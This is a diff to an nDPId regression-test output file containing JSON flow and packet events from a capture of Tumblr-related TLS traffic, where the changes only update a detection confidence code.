00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23664,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122095,"flow_last_seen":1605292122095,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292122095,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23664,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1605292122095,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122095,"pkt":"qtsDr8lk5EKm5WPyht1gD2uVACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAKltABu4i5CzgAAAAAoAL9IPiAAAACBAWgBAIIChLBJ8gAAAAAAQMDBw=="} -00676{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23851,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292102602,"flow_last_seen":1605292122118,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":16900,"flow_avg_l4_payload_len":528,"midstream":1,"thread_ts_msec":1605292122118,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00676{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23851,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292102602,"flow_last_seen":1605292122118,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":16900,"flow_avg_l4_payload_len":528,"midstream":1,"thread_ts_msec":1605292122118,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24118,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1605292122163,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122163,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgLAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbuW0O3zbp+IuQs5oBJXgJ7NAAACBAV4AQMDAwQCCArC3d\/9EsEnyA=="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24126,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1605292122163,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122163,"pkt":"qtsDr8lk5EKm5WPyht1gD2uVACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAKltABu4i5Cznt826ggBAB+yKbAAABAQgKEsEoDMLd3\/0="} -00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24188,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122095,"flow_last_seen":1605292122163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292122163,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ajax.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24239,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122064,"flow_last_seen":1605292122177,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605292122177,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01005{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24429,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122095,"flow_last_seen":1605292122212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605292122212,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"ajax.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24188,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122095,"flow_last_seen":1605292122163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292122163,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ajax.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24239,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122064,"flow_last_seen":1605292122177,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605292122177,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01005{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24429,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122095,"flow_last_seen":1605292122212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605292122212,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ajax.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24626,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1605292122439,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":203,"pkt_l4_len":149,"thread_ts_msec":1605292122439,"pkt":"qtsDr8lk5EKm5WPyht1gDKQRAJUGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFwAAAAAAACAK2QgBu\/13v3+ZlfzugBgB9aL3AAABAQgKG7m5ccLd3lMXAwMAcFVxaXihuhejZCNpZ5nuv6bEN9Yj5XMBxAt2QHwyRgmT6ybDwC5C73DyglYgxmIhMzt282zpUtE5GphT7ONBXskP6qssi1eNQHysgmBFeTvR+6kSeL0yhYhtFPIEYfWd8KPo3wOHIQIgFNXMNqMrZ9Q="} 
-00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24626,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1605292121674,"flow_last_seen":1605292122439,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1605292122439,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:817::200a","src_port":55560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24626,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1605292121674,"flow_last_seen":1605292122439,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1605292122439,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:817::200a","src_port":55560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24657,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1605292122501,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":149,"pkt_l4_len":95,"thread_ts_msec":1605292122501,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMAF8GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MQoadXXNVgBgB9QaPAAABAQgKTYUvYcLdm\/0XAwMAOgAAAAAAAAAIvZM7k4G8cjK7Q9\/YrVI4eMbPvi74lWEwjtUtgcQJsZEKgX5x1KPe5+ARIWOSp6YRK8o="} 
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24657,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1605292104650,"flow_last_seen":1605292122501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":21,"midstream":1,"thread_ts_msec":1605292122501,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24657,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1605292104650,"flow_last_seen":1605292122501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":21,"midstream":1,"thread_ts_msec":1605292122501,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24688,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122674,"flow_last_seen":1605292122674,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292122674,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24688,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1605292122674,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122674,"pkt":"qtsDr8lk5EKm5WPyht1gD3A1ACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPwBuzwV9u8AAAAAoAL9IJXTAAACBAWgBAIIChNnJ60AAAAAAQMDBw=="} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24691,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1605292122697,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122697,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGAGB0kqAcsBIEmLB5kd7IUo3\/YpAbuY\/FghbGM8FfbwoBJXgNHxAAACBAV4AQMDAwQCCArC3eI6E2cnrQ=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24692,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1605292122698,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122698,"pkt":"qtsDr8lk5EKm5WPyht1gD3A1ACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPwBuzwV9vBYIWxkgBAB+1XrAAABAQgKE2cnxcLd4jo="} 
-00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24693,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122674,"flow_last_seen":1605292122698,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":620,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1605292122698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24693,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122674,"flow_last_seen":1605292122698,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":620,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1605292122698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24694,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122698,"flow_last_seen":1605292122698,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a15","src_port":42674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24694,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1605292122698,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122698,"pkt":"qtsDr8lk5EKm5WPyht1gCuvGACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABKcpoVprIBu3ASIMYXhL6qgBAB9S93AAABAQgKNSTnjcLdLMU="} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24706,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1605292122741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122741,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAEpymhUqAcsBIEmLB5kd7IUo3\/YpAbumsheEvqpwEiDHgBALdyXtAAABAQgKwt3iZjUkMfM="} 
-00990{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24707,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122674,"flow_last_seen":1605292122755,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1605292122755,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00990{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24707,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122674,"flow_last_seen":1605292122755,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1605292122755,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24733,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122874,"flow_last_seen":1605292122874,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122874,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24733,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1605292122874,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122874,"pkt":"qtsDr8lk5EKm5WPyht1gDJQ7ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnP4Bu4CgSN\/gvLosgBAB9qrlAAABAQgK1OQQnsLdMvM="} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1605292122899,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122899,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgKAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbuc\/uC8uiyAoEjggBALQrp6AAABAQgKwt3jAtThR68="} 
@@ -199,7 +199,7 @@ 00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":49002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":49002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00635{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104013,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":664,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:8c6e:cf2c:8d6:9fb5","src_port":41266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":76,"flow_first_seen":1605292102602,"flow_last_seen":1605292122470,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":35234,"flow_avg_l4_payload_len":463,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 